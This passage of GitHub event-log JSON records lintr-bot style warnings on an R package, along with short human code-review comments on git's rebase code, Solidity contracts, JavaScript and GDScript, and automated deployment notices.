^~~~~~~~~~\n```\n[tests/testthat/test-lint.R:6:28:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​      absolute_paths_linter=absolute_paths_linter,\n                          ~^~\n```\n[tests/testthat/test-lint.R:7:24:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​      assignment_linter=assignment_linter,\n                      ~^~\n```\n[tests/testthat/test-lint.R:8:26:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​      closed_curly_linter=closed_curly_linter,\n                        ~^~\n```\n[tests/testthat/test-lint.R:9:20:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​      commas_linter=commas_linter,\n                  ~^~\n```\n[tests/testthat/test-lint.R:11:26:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​      infix_spaces_linter=infix_spaces_linter,\n                        ~^~\n```\n[tests/testthat/test-lint.R:12:25:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​      line_length_linter=line_length_linter,\n                       ~^~\n```\n[tests/testthat/test-lint.R:13:20:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​      no_tab_linter=no_tab_linter,\n                  ~^~\n```\n[tests/testthat/test-lint.R:14:26:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​      object_usage_linter=object_usage_linter,\n                        ~^~\n```\n[tests/testthat/test-lint.R:15:24:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​      snake_case_linter=snake_case_linter,\n                      ~^~\n```\n[tests/testthat/test-lint.R:16:27:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​      multiple_dots_linter=multiple_dots_linter,\n                         ~^~\n```\n[tests/testthat/test-lint.R:17:27:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​      object_length_linter=object_length_linter,\n                         ~^~\n```\n[tests/testthat/test-lint.R:18:24:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​      open_curly_linter=open_curly_linter,\n                      ~^~\n```\n[tests/testthat/test-lint.R:19:27:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​      single_quotes_linter=single_quotes_linter,\n                         ~^~\n```\n[tests/testthat/test-lint.R:20:27:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​      spaces_inside_linter=spaces_inside_linter,\n                         ~^~\n```\n[tests/testthat/test-lint.R:22:34:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​      trailing_blank_lines_linter=trailing_blank_lines_linter,\n                                ~^~\n```\n[tests/testthat/test-lint.R:23:33:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​      trailing_whitespace_linter=trailing_whitespace_linter\n                               ~^~\n```\n[tests/testthat/test-lint.R:25:36:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​    lintr::expect_lint_free(linters=my_linters)\n                                  ~^~\n```\n[tests/testthat/test-lint.R:25:37:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L25) *style:* **Variable and function names should not use underscores.**\n```r\n​    lintr::expect_lint_free(linters=my_linters)\n                                    ^~~~~~~~~~\n```\n[tests/testthat/test-naHandler.R:15:7:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-naHandler.R#L15) *style:* **Commas should always have a space after.**\n```r\n​  x[1,] <- NA\n      ^\n```\n[tests/testthat/test-naHandler.R:17:18:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-naHandler.R#L17) *style:* **Only use double-quotes.**\n```r\n​  expect_is(nas, 'list')\n                 ^~~~~~\n```\n[tests/testthat/test-rankTab.R:10:28:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-rankTab.R#L10) *style:* **Commas should always have a space after.**\n```r\n​  expect_equal(dim(d), c(3,2))\n                           ^\n```"}},"created_at":"2018-07-13T21:46:25Z"}
{"id":"7964502713","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29705796,"position":null,"line":null,"path":null,"commit_id":"f701dc352c219bdcdcb5fbf4ff590e3ac8409771","created_at":"2018-07-13T21:47:04Z","updated_at":"2018-07-13T21:47:04Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T21:47:04Z"}
{"id":"7964505361","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"bursevich/js-Prefr"},"payload":{"comment":{"id":29705803,"position":5,"line":13,"path":"eleventhLesson/scriptHW11.js","commit_id":"155575101ccec9547cdba300e4ab77c300c98dbb","created_at":"2018-07-13T21:47:43Z","updated_at":"2018-07-13T21:47:43Z","author_association":"NONE","body":"Это что за заготовки? Если нет элемента сразу возвращаем строку `return \\`element ${el} not found in array ${arr}`;`"}},"created_at":"2018-07-13T21:47:43Z"}
{"id":"7964507646","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29705813,"position":176,"line":210,"path":"builtin/rebase.c","commit_id":"f8429e950a45abe3b78f457491e26ea913b6730b","created_at":"2018-07-13T21:48:24Z","updated_at":"2018-07-13T21:48:24Z","author_association":"NONE","body":"This test should correspond to the `case \"$#\" in 0) ...` part, therefore `argc != 2` is incorrect here, it needs to be `argc< 2`, to account for the fact that `argc` could also be 3 here (if the command-line was `git rebase <upstream> <switch-to>`).\r\n\r\nPlease fix this commit accordingly."}},"created_at":"2018-07-13T21:48:24Z"}
{"id":"7964508511","type":"CommitCommentEvent","actor":{"login":"GummiWolf"},"repo":{"name":"AlexTorianyk/WPF-TicTacToe"},"payload":{"comment":{"id":29705821,"position":null,"line":null,"path":null,"commit_id":"b7793831eddcb7e0a527960f3839c3339edf3604","created_at":"2018-07-13T21:48:39Z","updated_at":"2018-07-13T21:48:39Z","author_association":"NONE","body":"Noice, good job, 200iq, ur living in 2078"}},"created_at":"2018-07-13T21:48:39Z"}
{"id":"7964508913","type":"CommitCommentEvent","actor":{"login":"leslieca"},"repo":{"name":"leslieca/lesliepractice"},"payload":{"comment":{"id":29705822,"position":null,"line":null,"path":null,"commit_id":"5505db12a0b8c82497157159f0ed08e0c0898011","created_at":"2018-07-13T21:48:46Z","updated_at":"2018-07-13T21:48:46Z","author_association":"OWNER","body":"45RT;LUZDFBLKBN ,"}},"created_at":"2018-07-13T21:48:46Z"}
{"id":"7964510516","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29705827,"position":176,"line":210,"path":"builtin/rebase.c","commit_id":"f8429e950a45abe3b78f457491e26ea913b6730b","created_at":"2018-07-13T21:49:13Z","updated_at":"2018-07-13T21:49:13Z","author_association":"NONE","body":"(A later commit changes the `!= 2` to `!= 1`, but it obviously needs to be changed to `< 1` instead.)"}},"created_at":"2018-07-13T21:49:13Z"}
{"id":"7964512925","type":"CommitCommentEvent","actor":{"login":"shmellyorc"},"repo":{"name":"NexInfinite/MiniJam-test"},"payload":{"comment":{"id":29705834,"position":null,"line":null,"path":null,"commit_id":"fbcb868464b002c1dcc8bd9f1e57004eff207ded","created_at":"2018-07-13T21:49:57Z","updated_at":"2018-07-13T21:49:57Z","author_association":"NONE","body":"In 3.0, try to use \"properties\" more than set_* or get_*. If it doesn't contain a property then use the set_* or get_*\r\n\r\nto fix your issue:\r\n```gdscript\r\n\r\nconst SPEED = 100\r\n\r\nfunc _process(delta):\r\n\tvar _pos = Vector2()\r\n\t\r\n\tif Input.is_key_pressed(KEY_LEFT):\r\n\t\tpos = Vector2(-1 * SPEED, 0)\r\n\tif Input.is_key_pressed(KEY_RIGHT)\r\n\t\tpos = Vector2(1 * SPEED, 0)\r\n\r\nfunc _physics_process(delta):\r\n\tapplied_force = pos\r\n\r\n```\r\n\r\n\r\n"}},"created_at":"2018-07-13T21:49:57Z"}
{"id":"7964513584","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29705838,"position":26,"line":21,"path":"contracts/Pausable.sol","commit_id":"ce742760c48dc09e81ab99f394fd86520eba0979","created_at":"2018-07-13T21:50:11Z","updated_at":"2018-07-13T21:50:11Z","author_association":"NONE","body":"Why `if`? Just `require`. You don't like -> you don't accept."}},"created_at":"2018-07-13T21:50:11Z"}
{"id":"7964516426","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29705847,"position":null,"line":null,"path":null,"commit_id":"13c8f4c322013a5aea1c45a7a34a4a0693c33a99","created_at":"2018-07-13T21:51:02Z","updated_at":"2018-07-13T21:51:02Z","author_association":"COLLABORATOR","body":"Might need to add more information to the hover later down the line. I also commented out the section of code that opens up a JPanel, as it's useless until it becomes needed."}},"created_at":"2018-07-13T21:51:02Z"}
{"id":"7964516613","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29705848,"position":29,"line":24,"path":"contracts/Splitter.sol","commit_id":"ce742760c48dc09e81ab99f394fd86520eba0979","created_at":"2018-07-13T21:51:06Z","updated_at":"2018-07-13T21:51:06Z","author_association":"NONE","body":"You should keep consistent with the spacing around `=`."}},"created_at":"2018-07-13T21:51:06Z"}
{"id":"7964517736","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29705852,"position":28,"line":23,"path":"contracts/Splitter.sol","commit_id":"ce742760c48dc09e81ab99f394fd86520eba0979","created_at":"2018-07-13T21:51:25Z","updated_at":"2018-07-13T21:51:25Z","author_association":"NONE","body":"You can remove the `( )`, they don't add any information."}},"created_at":"2018-07-13T21:51:25Z"}
{"id":"7964518782","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29705857,"position":null,"line":null,"path":null,"commit_id":"e1d7d30476b7f465f360ff3682cf5b2fcf4d2305","created_at":"2018-07-13T21:51:43Z","updated_at":"2018-07-13T21:51:43Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-7](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-7-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T21:51:43Z"}
{"id":"7964519663","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29705863,"position":40,"line":32,"path":"contracts/Splitter.sol","commit_id":"ce742760c48dc09e81ab99f394fd86520eba0979","created_at":"2018-07-13T21:51:58Z","updated_at":"2018-07-13T21:51:58Z","author_association":"NONE","body":"The common practice is to `require(aux > 0)`."}},"created_at":"2018-07-13T21:51:58Z"}
{"id":"7964525090","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"bursevich/js-Prefr"},"payload":{"comment":{"id":29705874,"position":17,"line":38,"path":"eleventhLesson/scriptHW11.js","commit_id":"292af3ed5e8f9638a8520c16f40f16fb40725181","created_at":"2018-07-13T21:53:35Z","updated_at":"2018-07-13T21:53:35Z","author_association":"NONE","body":"Вы проверяли вообще работает или нет? По логике все верно, но к сожалению эта функция работает некорректно. Надеюсь, сами найдете причину."}},"created_at":"2018-07-13T21:53:35Z"}
{"id":"7964526498","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"barrenWuffet/convPkg"},"payload":{"comment":{"id":29705876,"position":null,"line":null,"path":null,"commit_id":"f4e482b33db249527739d00443792377dfd08ea1","created_at":"2018-07-13T21:53:59Z","updated_at":"2018-07-13T21:53:59Z","author_association":"NONE","body":"[R/cat_names.R:5:18:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cat_names.R#L5) *style:* **Commas should always have a space after.**\n```r\n​  cat(paste(\",'\",names(x), \"'\",'\\n', sep = ''))\n                 ^\n```\n[R/cat_names.R:5:32:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cat_names.R#L5) *style:* **Commas should always have a space after.**\n```r\n​  cat(paste(\",'\",names(x), \"'\",'\\n', sep = ''))\n                               ^\n```\n[R/cat_names.R:5:32:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cat_names.R#L5) *style:* **Only use double-quotes.**\n```r\n​  cat(paste(\",'\",names(x), \"'\",'\\n', sep = ''))\n                               ^~~~\n```\n[R/cat_names.R:5:44:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cat_names.R#L5) *style:* **Only use double-quotes.**\n```r\n​  cat(paste(\",'\",names(x), \"'\",'\\n', sep = ''))\n                                           ^~\n```\n[R/cat_names.R:7:1:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cat_names.R#L7) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/cat_names.R:8:1:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cat_names.R#L8) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/cat_names.R:9:1:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cat_names.R#L9) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/clusDropVar2.R:21:13:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L21) *style:* **Commas should never have a space before.**\n```r\n​  vte = c() ,\n           ~^\n```\n[R/clusDropVar2.R:41:29:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L41) *style:* **Commas should always have a space after.**\n```r\n​        ddm1 <- dudi.mix(x[,vtu1[-i]], add.square = FALSE, scannf = F, nf = ncol(x))\n                            ^\n```\n[R/clusDropVar2.R:51:34:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L51) *style:* **Commas should always have a space after.**\n```r\n​          pam1 <- clara(ddm1$li[,1:length(ddm1$eig[ddm1$eig > 1])], k = j, samples = 50)\n                                 ^\n```\n[R/clusDropVar2.R:57:44:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L57) *style:* **Commas should always have a space after.**\n```r\n​            print(paste(\"i: \", i, \" | k: \",j,\" | sil: \",sil1, \" | var: \",vtu1[i], sep = \"\"));flush.console()\n                                           ^\n```\n[R/clusDropVar2.R:57:46:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L57) *style:* **Commas should always have a space after.**\n```r\n​            print(paste(\"i: \", i, \" | k: \",j,\" | sil: \",sil1, \" | var: \",vtu1[i], sep = \"\"));flush.console()\n                                             ^\n```\n[R/clusDropVar2.R:57:57:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L57) *style:* **Commas should always have a space after.**\n```r\n​            print(paste(\"i: \", i, \" | k: \",j,\" | sil: \",sil1, \" | var: \",vtu1[i], sep = \"\"));flush.console()\n                                                        ^\n```\n[R/clusDropVar2.R:57:74:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L57) *style:* **Commas should always have a space after.**\n```r\n​            print(paste(\"i: \", i, \" | k: \",j,\" | sil: \",sil1, \" | var: \",vtu1[i], sep = \"\"));flush.console()\n                                                                         ^\n```\n[R/clusDropVar2.R:71:109:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L71) *style:* **Commas should always have a space after.**\n```r\n​      print(paste(\"Dropping var: \", varToDrop, \" | Best Score : \", max(scores1Df$score), \" | vtu1 length: \",length(vtu1) , sep = \"\"));flush.console()\n                                                                                                            ^\n```\n[R/clusDropVar2.R:71:122:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/clusDropVar2.R#L71) *style:* **Commas should never have a space before.**\n```r\n​      print(paste(\"Dropping var: \", varToDrop, \" | Best Score : \", max(scores1Df$score), \" | vtu1 length: \",length(vtu1) , sep = \"\"));flush.console()\n                                                                                                                        ~^\n```\n[R/cnn.R:13:19:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cnn.R#L13) *style:* **Commas should always have a space after.**\n```r\n​    print(paste(i,\": \", colnames(dataset)[i], \" | \", class(dataset[,i]), sep=\"\"))\n                  ^\n```\n[R/cnn.R:13:69:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cnn.R#L13) *style:* **Commas should always have a space after.**\n```r\n​    print(paste(i,\": \", colnames(dataset)[i], \" | \", class(dataset[,i]), sep=\"\"))\n                                                                    ^\n```\n[R/cnn.R:13:77:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/cnn.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​    print(paste(i,\": \", colnames(dataset)[i], \" | \", class(dataset[,i]), sep=\"\"))\n                                                                           ~^~\n```\n[R/hiFreqFact.R:13:27:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/hiFreqFact.R#L13) *style:* **Commas should always have a space after.**\n```r\n​  rt1 <- rt1[rt1$Freq > y,]\n                          ^\n```\n[R/hiFreqFact.R:14:32:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/hiFreqFact.R#L14) *style:* **Only use double-quotes.**\n```r\n​  x <- ifelse(x %in% rt1$x, x, 'other')\n                               ^~~~~~~\n```\n[R/ls.objects.R:26:49:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/ls.objects.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​    out <- out[order(out[[order.by]], decreasing=decreasing), ]\n                                               ~^~\n```\n[R/lsos.R:18:26:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/lsos.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​  lsObjects(..., order.by=\"Size\", decreasing=TRUE, head=TRUE, n=n)\n                        ~^~\n```\n[R/lsos.R:18:45:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/lsos.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​  lsObjects(..., order.by=\"Size\", decreasing=TRUE, head=TRUE, n=n)\n                                           ~^~\n```\n[R/lsos.R:18:56:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/lsos.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​  lsObjects(..., order.by=\"Size\", decreasing=TRUE, head=TRUE, n=n)\n                                                      ~^~\n```\n[R/lsos.R:18:64:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/lsos.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​  lsObjects(..., order.by=\"Size\", decreasing=TRUE, head=TRUE, n=n)\n                                                              ~^~\n```\n[R/naHandler.R:31:1:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/naHandler.R#L31) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/profileDat.R:11:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L11) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df <- data.frame(row_num = 1:ncol(x), col_name = names(x))\n  ^~~~~~\n```\n[R/profileDat.R:12:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L12) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$row_cnt <- nrow(x)\n  ^~~~~~\n```\n[R/profileDat.R:12:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L12) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$row_cnt <- nrow(x)\n         ^~~~~~~\n```\n[R/profileDat.R:14:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L14) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$uniq_val <- sapply(x, function(x) length(unique(x)))\n  ^~~~~~\n```\n[R/profileDat.R:14:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L14) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$uniq_val <- sapply(x, function(x) length(unique(x)))\n         ^~~~~~~~\n```\n[R/profileDat.R:16:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L16) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_cnt <- sapply(x, function(x) sum(is.na(x)))\n  ^~~~~~\n```\n[R/profileDat.R:16:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L16) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_cnt <- sapply(x, function(x) sum(is.na(x)))\n         ^~~~~~\n```\n[R/profileDat.R:18:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L18) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_cnt <- sapply(x, function(x) length(x[!is.na(x) & as.character(x) == '']))\n  ^~~~~~\n```\n[R/profileDat.R:18:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L18) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_cnt <- sapply(x, function(x) length(x[!is.na(x) & as.character(x) == '']))\n         ^~~~~~~~~\n```\n[R/profileDat.R:18:85:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L18) *style:* **Only use double-quotes.**\n```r\n​  pro_df$blank_cnt <- sapply(x, function(x) length(x[!is.na(x) & as.character(x) == '']))\n                                                                                    ^~\n```\n[R/profileDat.R:19:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L19) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$top_val <- sapply(x, function(x) rankTab(x)[1,'x'])\n  ^~~~~~\n```\n[R/profileDat.R:19:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L19) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$top_val <- sapply(x, function(x) rankTab(x)[1,'x'])\n         ^~~~~~~\n```\n[R/profileDat.R:19:56:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L19) *style:* **Commas should always have a space after.**\n```r\n​  pro_df$top_val <- sapply(x, function(x) rankTab(x)[1,'x'])\n                                                       ^\n```\n[R/profileDat.R:19:56:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L19) *style:* **Only use double-quotes.**\n```r\n​  pro_df$top_val <- sapply(x, function(x) rankTab(x)[1,'x'])\n                                                       ^~~\n```\n[R/profileDat.R:21:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n  ^~~~~~\n```\n[R/profileDat.R:21:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n         ^~~~~~\n```\n[R/profileDat.R:21:26:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n                         ^~~~~~\n```\n[R/profileDat.R:21:33:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n                                ^~~~~~\n```\n[R/profileDat.R:21:42:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n                                         ^~~~~~\n```\n[R/profileDat.R:21:49:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n                                                ^~~~~~~\n```\n[R/profileDat.R:22:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n  ^~~~~~\n```\n[R/profileDat.R:22:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n         ^~~~~~~~~\n```\n[R/profileDat.R:22:29:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n                            ^~~~~~\n```\n[R/profileDat.R:22:36:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n                                   ^~~~~~~~~\n```\n[R/profileDat.R:22:48:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n                                               ^~~~~~\n```\n[R/profileDat.R:22:55:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n     